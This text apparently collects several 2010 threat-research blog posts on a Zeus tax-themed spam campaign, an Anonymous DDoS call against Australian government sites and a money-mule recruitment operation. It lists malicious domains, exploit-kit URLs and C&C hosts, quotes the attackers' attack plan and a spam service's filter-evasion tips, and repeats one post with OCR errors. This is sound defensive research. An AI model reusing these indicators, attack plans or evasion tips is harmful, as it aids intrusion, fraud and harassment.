ns2.mythinregion.ws - Email: info@gtec.ru
ns2.partytimee.cn - 38.99.169.208 - Email: chunk@qx8.ru
ns3.cnnandpizza.cc - 195.182.57.36 - Email: bears@fastermail.ru
ns3.partymorning.ws - 94.23.114.71 - Email: info@gtec.ru

Take a look at the routing graph for a moment. Who do we have here? Our "dear friends" at [18]AS5577 ROOT eSolutions (also seen [19]here; [20]here; [21]here; [22]here; [23]here and [24]here), acting as a node for an ever expanding portfolio of malicious customers, with AS50215 Troyak-as Starchenko Roman Fedorovich, part of the [25]Pushdo crimeware and [26]client-side exploit serving campaigns, [27]second in the list.

AS47560 - VESTEH-NET-as Vesteh LLC has been notified; awaiting a response/take down reaction, or the lack of such.

Related coverage of money laundering in the context of cybercrime:

[28] Keeping Reshipping Mule Recruiters on a Short Leash

[29] Keeping Money Mule Recruiters on a Short Leash

[30] Standardizing the Money Mule Recruitment Process

[31] Money Mule Recruiters use ASProx's Fast Fluxing Services

[32] Money Mules Syndicate Actively Recruiting Since 2002

[33] Inside a Money Laundering Group's Spamming Operations

This post has been reproduced from [34]Dancho Danchev's blog. Follow him [35]on Twitter.

1. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

2. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

3. http://blogs.zdnet.com/security/?p=2293

4. http://www.messagelabs.com/mlireport/MLI_2010_01_Jan_FINAL_EN.pdf

5. http://blogs.zdnet.com/security/?p=1514

6. http://twitter.com/danchodanchev/status/8638311702

7. http://twitter.com/danchodanchev/status/8638405085

8. http://twitter.com/danchodanchev/status/8638505748

9. http://twitter.com/danchodanchev/status/8638623148

10. http://twitter.com/danchodanchev/status/8638713256

11. http://twitter.com/danchodanchev/status/8638841565

12. https://zeustracker.abuse.ch/monitor.php?as=47560

13. http://google.com/safebrowsing/diagnostic?site=AS:47560

14. http://blogs.zdnet.com/security/?p=1085

15. http://www.delphifaq.com/faq/scams/f1057.shtml?p=22

16. http://www.delphifaq.com/faq/scams/f1057.shtml?p=22

17. https://zeustracker.abuse.ch/monitor.php?ipaddress=91.200.164.44

18. http://hphosts.blogspot.com/2009/11/crimeware-friendly-isps-root-esolutions.html

19. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html

20. http://ddanchev.blogspot.com/2009/02/cost-of-anonymizing-cybercriminals.html

21. http://ddanchev.blogspot.com/2009/12/diverse-portfolio-of-fake-security.html

22. http://ddanchev.blogspot.com/2009/08/us-federal-forms-blackhat-seo-themed.html

23. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

24. http://ddanchev.blogspot.com/2009/05/diverse-portfolio-of-fake-security.html

25. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

26. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

27. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

28. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html

29. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

30. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

31. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

32. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

33. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

34. http://ddanchev.blogspot.com/

35. http://twitter.com/danchodanchev
Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild (2010-02-11 22:19)

A currently ongoing malware campaign, courtesy of the gang that's been busy rotating themes over the past few weeks, has changed the theme to "You are in a higher tax bracket", and continues serving client-side exploits next to a Zeus crimeware sample using a bogus "You don't have the latest version of Macromedia Flash Player" error message.

- Sample URL: repl031 .be/reports/getreport.php?email=email - Email: souchuck@yahoo.com. The following currently suspended domains are also involved: repl032 .be; repl030.me .uk; repl031.me .uk; repl032.me .uk; repl030.co .uk; repl031.co .uk; repl032.co .uk; repl043.me .uk; repl041.co .uk; repl032.co .uk



[Routing graph image not reproduced; legible labels: 116.80.0.0/14, AS2510]



- UPDATED: The most recently spamvertised domains include:

repl041 .kr - Email: Souchuck@yahoo.com
repl042 .kr - Email: Souchuck@yahoo.com
repl043 .kr - Email: Souchuck@yahoo.com
rep1044 .kr - Email: Souchuck@yahoo.com
repl041.ne .kr - Email: Souchuck@yahoo.com
repl042.ne .kr - Email: Souchuck@yahoo.com
repl043.ne .kr - Email: Souchuck@yahoo.com
repl041.co .kr - Email: Souchuck@yahoo.com
repl042.co .kr - Email: Souchuck@yahoo.com
repl043.co .kr - Email: Souchuck@yahoo.com
repl044.co .kr - Email: Souchuck@yahoo.com
repl041.or .kr - Email: Souchuck@yahoo.com
repl042.or .kr - Email: Souchuck@yahoo.com
repl043.or .kr - Email: Souchuck@yahoo.com
repl044.or .kr - Email: Souchuck@yahoo.com 
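The repl04x series above, like the justinnew1-24 series in the previous post, is a naming template: one stem, a serial number and a handful of TLDs registered in bulk. Below is an added example, not the post's own tooling, that groups a defanged domain list by that template and reports the serial numbers missing from each observed run, which is what a defender would turn into a watchlist rather than waiting for the next spam wave. The sample lines are constructed in the page's "domain .tld - Email:" format with placeholder registrant addresses.

```python
"""Cluster defanged campaign domains by naming template (stem + serial number +
TLD), as in the repl041.kr / repl042.co.kr lists above. Added example, not the
post's own tooling; SAMPLE_LINES are constructed in the page's format with
placeholder registrant addresses."""
import re
from collections import defaultdict

# Constructed sample in the page's "domain .tld - Email: addr" format.
SAMPLE_LINES = """\
repl041 .kr - Email: registrant@example.invalid
repl042 .kr - Email: registrant@example.invalid
repl043.co .kr - Email: registrant@example.invalid
repl044.co .kr - Email: registrant@example.invalid
repl041.or .kr - Email: registrant@example.invalid
justinnew7 .com - Email: other@example.invalid
justinnew24 .com - Email: other@example.invalid
unrelated-site .net - Email: other@example.invalid
"""

LINE_RE = re.compile(r"^(?P<domain>.+?)\s+-\s+Email:\s+\S+@\S+")


def refang(domain):
    """'repl043.co .kr' / 'repl043.co ,kr' -> 'repl043.co.kr' (page-style defanging only)."""
    return re.sub(r"\s*[.,]\s*", ".", domain.strip()).lower()


def parse_domains(text):
    """Refanged domains from 'domain - Email: addr' lines; other lines are skipped."""
    found = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            found.append(refang(m.group("domain")))
    return found


def template(domain):
    """Replace each digit run with '#': repl041.co.kr and repl044.co.kr share 'repl#.co.kr'."""
    return re.sub(r"\d+", "#", domain)


def first_number(domain):
    """The first digit run in the name as an int, or None if there is none."""
    m = re.search(r"\d+", domain)
    return int(m.group()) if m else None


def cluster_by_template(domains):
    """{template: sorted members}, keeping only templates that contain a serial number."""
    groups = defaultdict(set)
    for d in domains:
        groups[template(d)].add(d)
    return {t: sorted(m) for t, m in groups.items() if "#" in t}


def missing_serials(members):
    """Serial numbers absent from the observed run, e.g. 41, 42, 44 -> [43].
    Gaps are candidates the campaign may register next (or already has, unseen)."""
    nums = sorted({n for n in map(first_number, members) if n is not None})
    if len(nums) < 2:
        return []
    present = set(nums)
    return [n for n in range(nums[0], nums[-1] + 1) if n not in present]


def campaign_families(domains, min_size=2):
    """Templates backed by at least min_size domains, with members and serial gaps."""
    out = {}
    for tmpl, members in cluster_by_template(domains).items():
        if len(members) >= min_size:
            out[tmpl] = {"members": members, "gaps": missing_serials(members)}
    return out


if __name__ == "__main__":
    families = campaign_families(parse_domains(SAMPLE_LINES))
    for tmpl, info in sorted(families.items()):
        print(f"{tmpl}: {len(info['members'])} seen, serial gaps {info['gaps']}")
```

A template that only ever has one member (repl041.or.kr in the sample) is dropped by min_size, which keeps ordinary domains with a digit in the name from showing up as a "family"; the gap list for a template is what goes onto a watchlist, with the TLD variants (.kr, .co.kr, .ne.kr, .or.kr) treated as separate templates so a gap is reported per TLD.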

- Sample detection rate:

update.exe - [1]PWS:Win32/Zbot.RS - Result: 8/41 (19.52 %); MD5: 44028f0e2fa3ec70507992cb0684ff58


- Name servers of notice:

ns1.socialworc .net - 87.117.245.9 - Email: storylink@live.com
ns1.trihtmens .net - 87.117.245.9
ns1.inserthelping .net - suspended
ns1.citysatellites .net - down

- Sample message: "Dear taxpayer, The Federal income tax is a progressive tax, meaning that the more you earn, the higher your tax rate. Your tax rate depends not just upon your taxable income, but also upon your filing status (single, married filing jointly, etc.). You're in a higher tax bracket because: - your annual income for the last tax year has increased. Please review your annual tax report immediately at: get report."

- Sample iFrame used: 109.95.115.36 /uzs/in.php, also used in last [2]week's PhotoArchive campaign; AS50215 - Troyak-as Starchenko Roman Fedorovich - akanyovskiy@troyak.org; akanyovskiy@vishclub.net, serving CVE-2007-5659; CVE-2008-2992; CVE-2009-0927; CVE-2009-4324.

[Routing graph image not reproduced; AS4713 is the only legible label]



- Sample malware detection rate/phone back C&Cs: update.exe - [3]Trojan-Spy.Win32.Zbot.gen - Result: 8/41 (19.52 %), MD5: f15d88ac3e381aeb6b3779b0dd7042ce.

Upon execution it phones back to [4]trollar .ru/cnf/trl.jpg - 109.95.114.133 - Email: bernardo_pr@inbox.ru; [5]AS50369 - VISHCLUB-AS Kanyovskiy Andriy Yuriyovich. The same email was also used to register the Zeus C&C from last week's "[6]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild" campaign.

- Name servers of notice: ns1.gompley .net - 74.117.63.218 - Email: storylink@live.com; ns1.hoocky .net - 74.117.63.218 - Email: footboolfan7@aol.com. Also known to have been parked on the same IP are ns1.allhostinfo .com - Email: line@metalfan.com; ns1.helpgoldbank .net - Email: glonders@gmail.com and ns1.drowthdb .com.

- Second portfolio of related name servers, parked at 62.19.3.2: ns1.faktorypro .com - Email: poolbill@hotmail.com; ns1.x-videocovers .net - Email: storylink@live.com; ns1.serwisezone .net - Email: line@metalfan.com; ns1.guarantexpres .com; ns1.respectiveowners .net
Updates will be posted as soon as new developments emerge.

Related coverage of the gang's previous campaigns: 

[7] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[8] Facebook/AOL Update Tool Spam Campaign Serving 
Crimeware and Client-Side Exploits 

[9] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 



[10] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[11] Pushdo Injecting Bogus Swine Flu Vaccine 

[12] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[13] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[14] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [15]Dancho Danchev's 
blog. Follow him [16]on Twitter. 

1. http://www.virustotal.com/analisis/aa9f7b84bf5b1937a529b0b9c0d3488971cdf23d318053cfe818333ae7639737-1265930510

2. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

3. http://www.virustotal.com/analisis/08c6a859e00d5011bf3c67a03466c5567db7678f0bba0f174619ac5298bf2ec9-1265915258

4. https://zeustracker.abuse.ch/monitor.php?host=trollar.ru

5. https://zeustracker.abuse.ch/monitor.php?as=50369

6. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

7. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

8. http://ddanchev.blogspot.com/2010/01/facebookaol-update-tool-spam-campaign.html

9. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

10. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

11. http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html

12. http://ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.html

13. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html

14. http://ddanchev.blogspot.com/2009/07/multitasking-fast-flux-botnet-that.html

15. http://ddanchev.blogspot.com/

16. http://twitter.com/danchodanchev

'Anonymous' Group's DDoS Operation Titstorm (2010- 
02-12 01:40) 
operation: titstorm

A PART OF OPERATION INTERNET FREEDOM

the Attack!

1. On February 10th 8:00 AM Australian time we will begin a DDoS of government servers

2. This will be quickly followed by a shitstorm of porn email, fax spam, black faxes, and prank phone calls to government offices (emails/faxes should focus on small-breasted porn, cartoon porn, and female ejaculation, the 3 types banned so far)

3. Information on the targets for the shitstorm can be found here:

HTTP: /AILIU. RPH. GOVRU/OPS/ROnifll STRPTl OT1.HTIT

WHAT? WHEN?

PARTICIPATE FELLOW ANONYMOUS!

The Campaign begins..

8:00 AM, AUSTRALIAN TIME (GMT +10:00) February 10th.

(FEBRUARY 9TH FOR U.S.A. AND CANADA.)

(5:00 EST / 4:00 CST, etc.)

TO FULLY PARTICIPATE IN THE ATTACK:

Use an IRC Client and connect to...

Server: irc.anonnet.org
Channel: #titstorm

"We are Anonymous. We are legion."
- Regards, Anonymous


With last month's [1]'Anonymous' Group's DDoS Operation Titstorm campaign a clear success, based on real-time monitoring of the crowdsourcing-driven attack, it's time to take a brief retrospective on the tools and tactics used, and to relate them to an analysis of 2009's failed [2]Operation Didgeridie DDoS campaign.

Why is Operation Titstorm an important one to profile? Not only because it worked, compared to [3]Operation Didgeridie, but also because crowdsourcing-driven (malicious culture of participation) DDoS attacks have proven themselves throughout the past several years as an alternative to DDoS-for-hire attacks.



- DIY ICMP flooders

- Web based multiple iFrame loaders to consume server CPU

- Web based email bombing tools + predefined lists of emails belonging to government officials/employees

Go through related posts on crowdsourcing DDoS attacks/malicious culture of participation:

[4] Coordinated Russia vs Georgia cyber attack in progress

[5] Iranian opposition launches organized cyber attack against pro-Ahmadinejad sites

[6] People's Information Warfare Concept

[7] Electronic Jihad v3.0 - What Cyber Jihad Isn't

[8] Electronic Jihad's Targets List

[9] The DDoS Attack Against CNN.com

[10] Chinese Hacktivists Waging People's Information Warfare Against CNN

[11] The Russia vs Georgia Cyber Attack

[12] Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks

[13] Pro-Israeli (Pseudo) Cyber Warriors Want your Bandwidth

[14] Iranian Opposition DDoS-es pro-Ahmadinejad Sites

This post has been reproduced from [15]Dancho Danchev's blog. Follow him [16]on Twitter.



1. http://www.smh.com.au/technology/technology-news/operation-titstorm-hackers-bring-down-government-websites-20100210-nqku.html

2. http://blogs.zdnet.com/security/?p=4234

3. http://blogs.zdnet.com/security/?p=4234

4. http://blogs.zdnet.com/security/?p=1670

5. http://blogs.zdnet.com/security/?p=3613

6. http://ddanchev.blogspot.com/2007/10/peoples-information-warfare-concept.html

7. http://ddanchev.blogspot.com/2007/11/electronic-jihad-v30-what-cyber-jihad.html

8. http://ddanchev.blogspot.com/2007/11/electronic-jihads-targets-list.html

9. http://ddanchev.blogspot.com/2008/04/ddos-attack-against-cnncom.html

10. http://ddanchev.blogspot.com/2008/04/chinese-hacktivists-waging-peoples.html

11. http://ddanchev.blogspot.com/2008/08/russia-vs-georgia-cyber-attack.html

12. http://ddanchev.blogspot.com/2008/10/real-time-osint-vs-historical-osint-in.html

13. http://ddanchev.blogspot.com/2009/01/pro-israeli-pseudo-cyber-warriors-want.html

14. http://ddanchev.blogspot.com/2009/06/iranian-opposition-ddos-es-pro.html

15. http://ddanchev.blogspot.com/

16. http://twitter.com/danchodanchev
Dissecting an Ongoing Money Mule Recruitment Campaign (2010-02-12 23:46)

Money mule recruiters can sometimes be described as mass-marketing zombies who have absolutely no idea who they're trying to recruit. Cefin Consulting & Finance - cefincf .com - 195.190.13.106 - Email: flier@infotorrent.ru is the very latest example of such a campaign, trying to recruit, well, me.

The initial recruitment email was spammed from maximumsxz78@roulottesste-anne.com with IP 221.154.76.195:

"Cefin Consulting & Finanace is one of the leading providers of consulting services in the world. Our success depends both on high quality of services and on professionally managed and reliable business processes. This is the reason why quality is our main concern. However, the only way to reach top-notch quality in our business is permanent struggle for quality and engineering of stable procedures. It is not possible to reach high quality standards without dedicated personnel striving for flawless operation of processes and projects in their daily life.

Currently we have a Financial Manager opening. No deadlines for applications are set. The job of Financial Manager includes processing of money transfers, sent to his personal bank accounts by company clients. Upon receiving a transfer the Financial Manager has to redirect it to the account specified by our dispatchers. All you need for this job are: 3-4 free hours a day, your wish, ability to work in a team and responsibility. The initial wages will equal 5 % of total monthly turnover.

Requirements to Candidates:

- 20 years old and more

- Be able to check your email several times a day

- Should have personal (or business) bank account

- Have a skill to communicate and access to the Internet.

- Foreign language (English is preferable).

- To have an opportunity in any working hours to go to closest Western Union location and make money transfer.

What we offer:

- Generous wages - (Your earnings will originally make 5 % from each payment. Your earnings will originally make 5 % from each payment. After 5 remittances if you will operatively work and correctly, your earnings raises up to 10 %.)

- Opportunity of increase in your earnings.

- Free seminars and training courses (After 6 months of great work).

2010 © Cefin Consulting & Finanace. If you are interested in this opening, don't hesitate to send your CV at our e-mail: cefincfss@yahoo.com. All right reserved."

Response received from cefincfss@yahoo.com with IP [1]91.207.4.162, asking for the following details, although the [2]DIY money-mule recruitment management interface automates the entire process, thereby allowing it to scale:

"If you have understood the meaning of work and ready to begin working with us, please send us your INFO in the following format:

1) First name; 2) Last name; 3) Country; 4) City; 5) Zip code; 6) Home Phone number, Work Phone number, Mobile Phone number; 7) Bank account info: a) Bank name; b) Account name; c) Account number; d) Sort code; 8) Scan you passport or driver license"

The CV forwarding email provided is mynesco@yahoo.com, although they'll even recruit you without sending them the required CV.

What's special about the bogus company is not the new template layout that they've purchased from a [3]vendor offering creatives for money-mule recruitment campaigns, but their attempt to establish themselves as a trusted brand by featuring fake certificates issued by easily recognizable brands, such as Western Union, MoneyGram, Investors in People, the World Business Community, and even an award from the Chamber Awards for 2004 in the category "Most Promising New Business".

Moreover, parked on the very same IP as the money mule recruitment site are domains currently serving live exploits, as well as a DIY interface for a spamming service known as "OS-CORP".

The certificates in question:

Cefin Consulting & Finance describes itself as:

"Cefin consulting & Finance was founded at the beginning of 1990. The emerged structure united specialists with unique background in management consulting, marketing research, business evaluation and stock-exchange operations. The following two companies constitute Cefin consulting & Finance:

- Omega Financial Dept. - the dedicated company in the field of securities operations;

- Omega Consult - the dedicated consulting company, rendering services in strategic planning and corporate management.

Activity of Cefin consulting & Finance is focused on generation of balanced solutions for active development of the company and minimization of business risks.

Cefin consulting & Finance offers successful managerial solutions through consulting support to projects in various spheres, namely: comprehensive restructuring and organizational development, generation of managing companies, engineering of tailored management systems for corporate clients, implementation of project management methods, business development financial and economic simulation.

Top-notch dedicated professionals with key competence in various consulting fields constitute our rigorous staff.

We boast to have management consulting and business strategy development experts, certified securities dealers, assessment and registration, marketing and financial specialists, corporate law and anti-monopoly legislation gurus.

Address: Cefin consulting & Finance is located at 510 East 80th Street, New York, New York 10021, United States 786-475-3994; 786-475-3994 (FAX)"
The money mule recruitment domain cefincf .com - 195.190.13.106 - Email: flier@infotorrent.ru remains active.

Parked on the same IP are also the following domains, currently hosting live exploit kits:

384756783900 .cn - Email: abuse@domainsreg.cn
109438129432 .cn - Email: abuse@domainsreg.cn
234273849543 .cn - Email: abuse@domainsreg.cn
783456788839 .cn - Email: abuse@domainsreg.cn
odnaklasniki .cn - Email: Michell.Gregory2009@yahoo.com - Email profiled in December 2009's "[4]Celebrity-Themed Scareware Campaign Abusing DocStoc" - money mule recruitment connection
mynes-consultings .cn - Email: grishanizov@gmail.com
mynes-consult .cn - Email: grishanizov@gmail.com
Sample live exploit structure, currently active at these domains:

- mynes-consult .cn -> if exploitation is not possible, the user is redirected to the legitimate newegg.com
- mynes-consult .cn/load.php?spl=mdac
- mynes-consult .cn/load.php?spl=buddy
- mynes-consult .cn/load.php?spl=myspace
- mynes-consult .cn/load.php?spl=vml2
- mynes-consult .cn/load.php?spl=ymj
- mynes-consult .cn/load.php?spl=zango1
- mynes-consult .cn/load.php?spl=zango2

All of these exploits drop load.exe - [5]TrojanDownloader:Win32/Cutwail.gen!C - Result: 41/41 (100.00 %), which upon execution phones back to 69.162.86.210.

With cybercriminals actively multi-tasking these days, this money mule recruitment gang doesn't make an exception. On one of the domains listed above, a low-profile DIY spamming service known as OS-CORP is offering its services.
The DIY spam service also has Terms of Service and offers basic spamming recommendations. The following is a roughly translated version of them:

"- No child Porno spamming!

- Do not offer me affiliate program ( % of sales), I do not care!

- ICQ almost always online, but this does not mean that I always present! If you have not received an answer immediately have patience, I will answer as soon as appearing!

- Mailing lists on bases of certain subjects are more expensive!

- I am not responsible for your campaigns and sites that are sometimes nailed in the process of spam! Use anti-abuse hosting!

- I'm not offering anti-abuse hosting services!

- I don't offer recommendations for such services. I give only the services that spam!

- Campaign's size should be UP TO 50 kb!

Recommendations for the preparation of material for delivery!

- Do not always send the same text messages, ideally, to change the text after each mailing, the effect of there!

- Do not use themes in writing (headers) words such as EARN, OFFER, do not put a lot of exclamation marks and other (better do without them), just one!

- For a good response from countries whose native language is not English (eg Sweden, Spain, Denmark, etc.) is highly desirable to use the native language of the text distributed to countries, it gives a wonderful effect, and should not be mistaken, in countries such not everyone knows English, verified repeatedly!

- Do not write too long texts on a number of reasons this does not give a positive effect, but not limited to one sentence worth! Ideally, make the text in a few not particularly bulky paragraphs!"

The deeper you analyze, the more malicious, and most importantly, inter-connected it gets.

Related coverage of money laundering in the context 
of cybercrime: 

[6] Keeping Money Mule Recruiters on a Short Leash - Part Two 
[7] Keeping Reshipping Mule Recruiters on a Short Leash

[8] Keeping Money Mule Recruiters on a Short Leash 

[9] Standardizing the Money Mule Recruitment Process 



[10] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[11] Money Mules Syndicate Actively Recruiting Since 2002 

[12] Inside a Money Laundering Group's Spamming Operations

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 
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Dissecting an Ongoing Money Mule Recruitment 
Campaign (2010-02-12 23:46) 

Money mule recruiters can be sometimes described as mass¬ 
marketing zombies, who have absolutely no idea who 

they're trying to recruit. Cefin Consulting & Finance - 

cefincf .com - 195.190.13.106 - Email: flier@infotorrent.ru 
is the very latest example of such a campaign, trying to 
recruit, well, me. 

The initial recruitment email was spammed from 

maximumsxz78@roulottesste-anne.com with IP 
221.154.76.195: 

11 Cefin Consulting & Finanace is one of the leading providers 
of consulting services in the world. Our success depends 
both on high quality of services and on professionally 

























managed and reliable business processes. This is the reason 
why quality is our main concern. However, the only way to 
reach top-notch quality in our business is permanent 
struggle for quality and engineering of stable procedures. It 
is not possible to reach high quality standards without 
dedicated personnel striving for flawless operation of 
processes and projects in their daily life. 

Currently we have a Financial Manager opening. No 
deadlines for applications are set. The job of Financial 

Manager includes processing of money transfers, sent to his 
persona! bank accounts by company clients. Upon 

receiving a transfer the Financial Manager has to redirect it 
to the account specified by our dispatchers. AH you need for 
this job are: 3-4 free hours a day, your wish, ability to work in 
a team and responsibility. The initial wages will equal 5 % of 
total monthly turnover. 

Requirements to Candidates: 

- 20 years old and more 
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- Be able to check your email several times a day 

- Should have personal (or business) bank account 

- Have a skill to communicate and access to the Internet. 

- Foreign language (English is preferable). 

- To have an opportunity in any working hours to go to 
closest Western Union location and make money transfer. 


What we offer: 


- Generous wages - (Your earnings will originally make 5 % 
from each payment. Your earnings will originally make 5 % 

from each payment. After 5 remittances if you will 
operatively work and correctly, your earnings raises up to 10 
%.) 

- Opportunity of increase in your earnings. 

- Free seminars and training courses (After 6 months of great 
work). 

2010 © Cefin Consulting & Finanacelf you are interested in 
this opening, don't hesitate to send your CV at our e-mail: 

cefincfss@yahoo.com AH right reserved. " 

Response received from cefincfss@yahoo.com with IP 
[1]91.207.4.162, asking for the following details, althrough 

the [2]DIY money-mule recruitment management 
interface automates the entire process, thereby allowing it 
to scale: 

" if you have understood the meaning of work and ready to 
begin working with us, please send us your INFO in the 
following format: 
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1) First name; 2) Last name; 3) Country; 4) City; 5) Zip code; 
6) Home Phone number, Work Phone number, 

Mobile Phone number; 7) Bank account info:; a) Bank name; 
b) Account name; c) Account number; d) Sort code; 8) Scan 
you passport or driver license" 


The CV forwarding email provided is mynesco@yahoo.com, although they'll even recruit you without sending them the required CV.

What's special about the bogus company is not the new template layout, purchased from a [3]vendor offering creatives for money-mule recruitment campaigns, but its attempt to establish itself as a trusted brand by featuring fake certificates issued by easily recognizable brands, such as Western Union, MoneyGram, Investors in People, the World Business Community, and even an award from the Chamber Awards for 2004 in the category "Most Promising New Business".

Moreover, parked on the very same IP where the money mule recruitment is, are also domains currently serving live exploits, as well as a DIY interface for a spamming service known as "OS-CORP".

The certificates in question: 
Cefin Consulting & Finance describes itself as:

" Cefin consulting & Finance was founded at the beginning of
1990. The emerged structure united specialists with unique 
background in management consulting, marketing research, 
business evaluation and stock-exchange 

operations. The following two companies constitute Cefin 
consulting & Finance: 

- Omega Financial Dept. - the dedicated company in the field 
of securities operations; 

- Omega Consult - the dedicated consulting company, 
rendering services in strategic planning and corporate 
management. 

Activity of Cefin consulting & Finance is focused on 
generation of balanced solutions for active development of 
the company and minimization of business risks. 
Cefin consulting & Finance offers successful managerial
solutions through consulting support to projects in various 
spheres, namely: comprehensive restructuring and 
organizational development, generation of managing 
companies, engineering of tailored management systems for 
corporate clients, implementation of project management 
methods, business development financial and economic 
simulation. 


Top-notch dedicated professionals with key competence in 
various consulting fields constitute our rigorous staff. 

We boast to have management consulting and business 
strategy development experts, certified securities dealers, 
assessment and registration, marketing and financial 
specialists, corporate law and anti-monopoly legislation 
gurus. 

Address: Cefin consulting & Finance is located at 510 East 80th Street, New York, New York 10021, United States 786-475-3994; 786-475-3994 (FAX)"
The money mule recruitment domain cefincf .com - 195.190.13.106 - Email: flier@infotorrent.ru remains active.

Parked on the same IP are also the following domains, 
currently hosting live exploit kits: 

384756783900 .cn - Email: abuse@domainsreg.cn 

109438129432 .cn - Email: abuse@domainsreg.cn 

234273849543 .cn - Email: abuse@domainsreg.cn 

783456788839 .cn - Email: abuse@domainsreg.cn 

odnaklasniki .cn - Email: Michell.Gregory2009@yahoo.com - Email profiled in December 2009's "[4] Celebrity-Themed Scareware Campaign Abusing DocStoc" - money mule recruitment connection

mynes-consultings .cn - Email: grishanizov@gmail.com 


mynes-consult .cn - Email: grishanizov@gmail.com 
Sample live exploit structure, currently active at these domains:

- mynes-consult .cn -> if exploitation is not possible, the user is redirected to the legitimate newegg.com

- mynes-consult .cn/load.php?spl=mdac

- mynes-consult .cn/load.php?spl=buddy

- mynes-consult .cn/load.php?spl=myspace

- mynes-consult .cn/load.php?spl=vml2

- mynes-consult .cn/load.php?spl=ymj

- mynes-consult .cn/load.php?spl=zangol

- mynes-consult .cn/load.php?spl=zango2

All of these exploits drop load.exe - [5]TrojanDownloader:Win32/Cutwail.gen!C - Result: 41/41 (100.00 %), which upon execution phones back to 69.162.86.210.

With cybercriminals actively multi-tasking these days, this money mule recruitment gang doesn't make an exception. On one of the domains listed above, a low-profile DIY spamming service known as OS-CORP is offering its services.
The DIY spam service also has Terms of Service and offers basic spamming recommendations. The following is a roughly translated version of them:

" - No child Porno spamming! 

- Do not offer me affiliate program ( % of sales), I do not 
care! 

- ICQ almost always online, but this does not mean that I 
always present! If you have not received an answer 

immediately have patience, I will answer as soon as 
appearing! 

- Mailing lists on bases of certain subjects are more 
expensive! 

- I am not responsible for your campaigns and sites that are sometimes nailed in the process of spam! Use anti-abuse hosting!

- I'm not offering anti-abuse hosting services! 

- I don't offer recommendations for such services. I give only the services that spam!

- Campaign's size should be UP TO 50 kb! 
Recommendations for the preparation of material for delivery!

- Do not always send the same text messages, ideally, to 
change the text after each mailing, the effect of there! 

- Do not use themes in writing (headers) words such as 
EARN, OFFER, do not put a lot of exclamation marks and 
other (better do without them), just one! 

- For a good response from countries whose native language 
is not English (eg Sweden, Spain, Denmark, etc.) is highly 
desirable to use the native language of the text distributed 
to countries, it gives a wonderful effect, and should not be 
mistaken, in countries such not everyone knows English, 
verified repeatedly! 

- Do not write too long texts on a number of reasons this does not give a positive effect, but not limited to one sentence worth! Ideally, make the text in a few not particularly bulky paragraphs!"

The deeper you analyze, the more malicious and, most importantly, the more interconnected it gets.

Related coverage of money laundering in the context 
of cybercrime: 

[6] Keeping Money Mule Recruiters on a Short Leash - Part Two

[7] Keeping Reshipping Mule Recruiters on a Short Leash

[8] Keeping Money Mule Recruiters on a Short Leash

[9] Standardizing the Money Mule Recruitment Process

[10] Money Mule Recruiters use ASProx's Fast Fluxing Services

[11] Money Mules Syndicate Actively Recruiting Since 2002

[12] Inside a Money Laundering Group's Spamming Operations

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 

1. http://www.projecthoneypot.org/ip_91.207.4.162?Vid=4lo20a29dlh0pnf8k2kpbinal2

2. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

3. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

4. http://ddanchev.blogspot.com/2009/12/celebrity-themed-scareware-campaign_07.html

5. 

http://www.virustotal.com/analisis/lddfcb68894a31cael3fcb 

0 6227 9 0 1c e 8 7 d 344 9 a44 2 c 6 d e S 3 b4 6 6 e0 91d1c a 5 e 7 -12 6 6 0 

06095 

6. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html

7. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html

8. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

9. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

10. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

11. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

12. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

13. http://ddanchev.blogspot.com/

14. http://twitter.com/danchodanchev




IRS/PhotoArchive Themed Zeus/Client-Side Exploits 
